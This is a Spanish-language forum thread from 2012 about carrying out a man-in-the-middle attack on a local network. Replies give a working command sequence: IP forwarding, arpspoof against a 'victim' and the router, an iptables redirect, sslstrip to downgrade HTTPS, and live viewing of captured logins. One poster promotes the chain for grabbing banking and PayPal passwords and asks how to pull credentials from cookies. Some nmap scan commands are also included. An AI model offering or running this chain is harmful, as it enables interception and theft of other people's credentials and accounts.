Título: ayuda con man in the middle Publicado por: mitroll025 en 13 Febrero 2012, 22:30 pm buenas buenas! tengo un pequeño problema jeje a
ver si me pueden ayudar en algo-- primero voy a decirles como es que estoy tratando de probar esto del Man in the middle, tengo 2 pc`s con xp, ambas conectadas a un router y en una de ellas tengo una maquina virtual con ubuntu.ok? bien ahora siguiendo los pasos de el pdf (MITM) que publicaron en este foro hay una explicacion de 4 pasos: 1-sudo nano /proc/sys/net/ipv4/ip_forward Cambiamos el 0 por 1 2-sudo wireshark –i [interface] 3-sudo arpspoof -i [interface] -t [ip_objetivo] [ip_router] 4-sudo arpspoof –i [interface] –t [ip_router] [ip_objetivo] en el paso 1 esta todo bien cambio los valores y listo ahora en el paso 2 mi duda esta en donde introduzco el comando sudo wireshark –i [interface] perdón por mi ignorancia pero en el lugar de interface debo poner por ejemplo "etho" o "lo" ??esa es mi primera duda en tal caso yo puse "lo" ahora en el paso 3 y 4 ingreso los comandos (ahi capaz arrastro el error del paso anterior donde dice interface puse "lo") y me da este error. "arpspoof : couldn`t arp for host 192.168.x.x " si pudieran sacarme de este aprieto se los agradeceria.. p/d: otra cosa en una parte del pdf dice "Para ver las direcciones IP que están conectadas a nuestra red, podemos entrar a nuestro router desde el navegador" yo entre en el mio es un d-link y no hay un panel de control ni una opcion para ver las pc conectadas entre al router desde el navegador y solo me da opciones para cambiar algunas configuraciones como por ejem la contraseña del wifi. Un millon de gracias.. Título: Re: ayuda con man in the middle Publicado por: MauroMasciar en 13 Febrero 2012, 22:39 pm Citar ahora en el paso 2 mi duda esta en donde introduzco el comando sudo wireshark –i [interface] perdón por mi ignorancia pero en el lugar de interface debo poner por ejemplo "etho" o "lo" ?? Te falta un poco de teoria de Linux y las redes... Puede ser eth0 eth1 wlan0 etc... El comando lo metes en la terminal, obviamente... Citar ahora en el paso 3 y 4 ingreso los comandos (ahi capaz arrastro el error del paso anterior donde dice No, no es asi, como dije, necesitas leer un poco mas, aprende que es lo, eth0, wlan0, etc...interface puse "lo") y me da este error. Citar p/d: otra cosa en una parte del pdf dice "Para ver las direcciones IP que están conectadas a nuestra red, podemos entrar a nuestro router desde el navegador" Podes usar NMAP: nmap -sP 192.168.1.1-255 nmap -sP -PI 192.168.1.1-255 Título: Re: ayuda con man in the middle Publicado por: mitroll025 en 13 Febrero 2012, 23:11 pm muchas gracias por la respuesta!!!y si es verdad estoy bastante verde todavia...tendre que leer mas..gracias por la ayuda..
Título: Re: ayuda con man in the middle Publicado por: ps3ps3ps3 en 13 Febrero 2012, 23:49 pm Te explico como lo hago yo en Ubuntu 11.10 facil facil,Instalo aircrack,dsniff y sslstrip 0.9 (asi ves contraseñas sin cifrar y cifradas,http y https,bancos online,paypal,etc...)
Cuando lo tengas instalado,pones la terminal y añades : echo 1 > /proc/sys/net/ipv4/ip_forward Luego añades: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 Luego: arpspoof -i eth0/wlan0 -t IPVICTIMA IPROUTER y empezara el "ataque" Ahora abres otra terminal sin cerrar la de antes y pones: sslstrip -w nombredetuarchivo Aqui empezara sslstrip 0.9 (sslstrip da el cambiazo a la victima que pide una pagina https,le da el cambiazo por la misma en http y ves la contraseña sin cifrar) Luego para ver el ataque en "vivo" abre otra terminal,sin cerrar la de antes,y pones: tail -f nombredetuarchivo y cuando al cvictima se meta en alguna pagina te saldra,tambien puedes poner en vez de tail -f,el wireshark,aunque para mi es un poco lioso. Asi lo hago yo y me va de lujo,prueba contigo mismo y veras como te sale. Aprovecho para hacer una pregunta,sabreis como hacer para pillar una pass y user que esta alojada en las cookies? una contraseña recordada vamos,osea hacer un mitm a mi mismo y verme mi pass en una pagina de logueo automatico,Gracias y saludos. Título: Re: ayuda con man in the middle Publicado por: MauroMasciar en 14 Febrero 2012, 00:25 am el wireshark,aunque para mi es un poco lioso. Aprovecho para hacer una pregunta,sabreis como hacer para pillar una pass y user que esta alojada en las cookies? una contraseña recordada vamos,osea hacer un mitm a mi mismo y verme mi pass en una pagina de logueo automatico,Gracias y saludos. Una vez que entendes el wireshark no es tan lioso... Y diria que hagas un nuevo post y no desvirtues el tema de nuestro amigo :silbar: |